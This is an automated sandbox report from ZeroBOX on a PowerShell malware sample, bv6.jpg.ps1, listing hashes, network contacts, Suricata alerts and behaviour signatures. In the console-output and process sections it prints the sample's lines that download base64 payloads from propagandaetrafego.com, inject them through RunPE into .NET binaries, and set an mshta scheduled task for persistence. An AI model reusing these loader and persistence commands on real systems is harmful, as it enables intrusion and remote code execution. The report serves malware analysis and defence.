Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 8, 2023, 2:05 p.m.	July 8, 2023, 2:08 p.m.

Size	1.4KB
Type	ASCII text, with CRLF line terminators
MD5	`59a8cad944c41d6673ca0550b0177016`
SHA256	`f3e809cbc390ca8e97e6fc036c8ecc020f75544a42a60812ed42d6d09701ad3c`
CRC32	`FC4F8A6D`
ssdeep	`24:b5UBKC2qbQdmBKC2qb25V6Hpjs6HVx76Hnjs6Hoss6HrJs6HZ1VfSMnkFlmEWWG:b5UB36dmB3cipKTLV5KMTp`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\bv6.jpg.ps1
3044
- schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 1 /tn PDF /tr " mshta https://propagandaetrafego.com/h.html /F
  2160

Name	Response	Post-Analysis Lookup
propagandaetrafego.com	A 216.172.161.107	216.172.161.107

IP Address	Status	Action
164.124.101.2	Active	Moloch
216.172.161.107	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49167 -> 216.172.161.107:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49166 -> 216.172.161.107:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49163 -> 216.172.161.107:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49165 -> 216.172.161.107:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW July 8, 2023, 2:06 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW July 8, 2023, 2:06 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (43 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: The term '$' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x00000023	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: or operable program. Check the spelling of the name, or if a path was included, console_handle: 0x0000002f	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\bv6.jpg.ps1:1 char:2 console_handle: 0x00000047	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + CategoryInfo : ObjectNotFound: ($:String) [], CommandNotFoundEx console_handle: 0x0000005f	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: ception console_handle: 0x0000006b	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: Exception calling "DownloadString" with "1" argument(s): "The underlying connec console_handle: 0x00000097	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: tion was closed: An unexpected error occurred on a send." console_handle: 0x000000a3	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\bv6.jpg.ps1:6 char:101 console_handle: 0x000000af	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + [byte[]]$conexaojamaica=[System.Convert]::FromBase64String((New-Object Net.We console_handle: 0x000000bb	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: bClient).DownloadString <<<< ('https://propagandaetrafego.com/julhovenom.txt')) console_handle: 0x000000c7	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000df	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000eb	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: Exception calling "DownloadString" with "1" argument(s): "The underlying connec console_handle: 0x00000023	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: tion was closed: An unexpected error occurred on a send." console_handle: 0x0000001b	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\bv6.jpg.ps1:8 char:92 console_handle: 0x00000027	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + [Byte[]] $DLL =[System.Convert]::FromBase64String((New-Object Net.WebClient). console_handle: 0x0000003f	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: DownloadString <<<< ('https://propagandaetrafego.com/runpe.txt')); console_handle: 0x0000004b	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000057	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000063	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: Multiple ambiguous overloads found for "Load" and the argument count: "1". console_handle: 0x00000083	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: At line:1 char:11 console_handle: 0x0000008f	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + $ewe0.Load <<<< ($DLL) console_handle: 0x0000009f	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodException console_handle: 0x000000ab	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + FullyQualifiedErrorId : MethodCountCouldNotFindBest console_handle: 0x000000b7	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: Unable to find type [RunPE.RunPE]: make sure that the assembly containing this console_handle: 0x000000db	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: type is loaded. console_handle: 0x000000e7	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\bv6.jpg.ps1:19 char:14 console_handle: 0x000000f3	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + [RunPE.RunPE] <<<< ::Execute('C:\Windows\Microsoft.NET\Framework\v4.0.30319\c console_handle: 0x000000ff	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: vtres.exe' ,$conexaojamaica) console_handle: 0x0000010b	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + CategoryInfo : InvalidOperation: (RunPE.RunPE:String) [], Runti console_handle: 0x00000117	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: meException console_handle: 0x00000123	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + FullyQualifiedErrorId : TypeNotFound console_handle: 0x0000012f	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: Unable to find type [RunPE.RunPE]: make sure that the assembly containing this console_handle: 0x0000014f	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: type is loaded. console_handle: 0x0000015b	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\bv6.jpg.ps1:20 char:14 console_handle: 0x00000167	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + [RunPE.RunPE] <<<< ::Execute('C:\Windows\Microsoft.NET\Framework\v2.0.50727\a console_handle: 0x00000173	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: spnet_regbrowsers.exe' ,$conexaojamaica) console_handle: 0x0000017f	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + CategoryInfo : InvalidOperation: (RunPE.RunPE:String) [], Runti console_handle: 0x0000018b	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: meException console_handle: 0x00000197	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: + FullyQualifiedErrorId : TypeNotFound console_handle: 0x000001a3	1	1
WriteConsoleW July 8, 2023, 2:06 p.m.	buffer: SUCCESS: The scheduled task "PDF" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (13 events)

Time & API	Arguments	Status	Return
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f4178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f42f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 2:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f42f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 8, 2023, 2:06 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (41 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06200000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06201000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06202000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06203000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02689000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05623000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05624000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05625000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05630000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06204000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06205000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06206000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0620a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0621b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0621c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0621d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0621e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05626000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05446000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05447000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05448000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05431000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05627000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05628000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05631000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0621f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 2:06 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05629000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a suspicious process (1 event)

cmdline

"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 1 /tn PDF /tr " mshta https://propagandaetrafego.com/h.html /F

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 8, 2023, 2:06 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (4 events)

Data sent	yud¨î¹lãQà2vLÈÌ[%¸Ø:Ä`30y¡K/5 ÀÀÀ À 284ÿpropagandaetrafego.com
Data sent	yud¨îºcÜ0úÉh,Ê=Á\\|«$StX4¼Â/5 ÀÀÀ À 284ÿpropagandaetrafego.com
Data sent	yud¨îºvÉèÔ¯kW)ñä£ÔJøÆ\sðÛëè¨`)/5 ÀÀÀ À 284ÿpropagandaetrafego.com
Data sent	yud¨îºßQ¸8°å¢!:»±:â÷ûxö³/5 ÀÀÀ À 284ÿpropagandaetrafego.com

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 1 /tn PDF /tr " mshta https://propagandaetrafego.com/h.html /F

Installs itself for autorun at Windows startup (1 event)

cmdline

"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 1 /tn PDF /tr " mshta https://propagandaetrafego.com/h.html /F

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
send July 8, 2023, 2:06 p.m.	buffer: yud¨î¹lãQà2vLÈÌ[%¸Ø:Ä`30y¡K/5 ÀÀÀ À 284ÿpropagandaetrafego.com socket: 1608 sent: 126	1	126
send July 8, 2023, 2:06 p.m.	buffer: yud¨îºcÜ0úÉh,Ê=Á\\|«$StX4¼Â/5 ÀÀÀ À 284ÿpropagandaetrafego.com socket: 1608 sent: 126	1	126
send July 8, 2023, 2:06 p.m.	buffer: yud¨îºvÉèÔ¯kW)ñä£ÔJøÆ\sðÛëè¨`)/5 ÀÀÀ À 284ÿpropagandaetrafego.com socket: 1608 sent: 126	1	126
send July 8, 2023, 2:06 p.m.	buffer: yud¨îºßQ¸8°å¢!:»±:â÷ûxö³/5 ÀÀÀ À 284ÿpropagandaetrafego.com socket: 1608 sent: 126	1	126

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 1 /tn PDF /tr " mshta https://propagandaetrafego.com/h.html /F

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\schtasks.exe

bv6.jpg.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All